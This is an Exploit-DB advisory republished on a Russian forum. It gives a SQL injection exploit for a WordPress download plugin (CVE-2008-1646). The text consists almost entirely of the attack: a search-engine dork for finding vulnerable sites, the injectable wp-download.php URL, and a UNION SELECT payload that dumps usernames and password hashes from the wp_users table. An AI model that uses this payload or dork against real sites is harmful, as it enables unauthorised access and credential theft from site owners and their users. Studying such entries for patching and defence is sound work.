- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5326
- Проверка EDB
-
- Пройдено
- Автор
- BL4CK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-1646
- Дата публикации
- 2008-03-31
Код:
###############################################################
#
# Wordpress Plugin Download file Remote SQL Injection Vulnerability
#
###############################################################
#
# Author: BL4CK
#
# Mail: [email protected]
#
################################################################
#
# Dork: inurl:"wp-download.php?dl_id="
#
################################################################
Example:
http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]
SQL:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
################################################################
# Greetz: ZioN, b!g B0$$, h4cky0u.org
################################################################
# milw0rm.com [2008-03-31]- Источник
- www.exploit-db.com
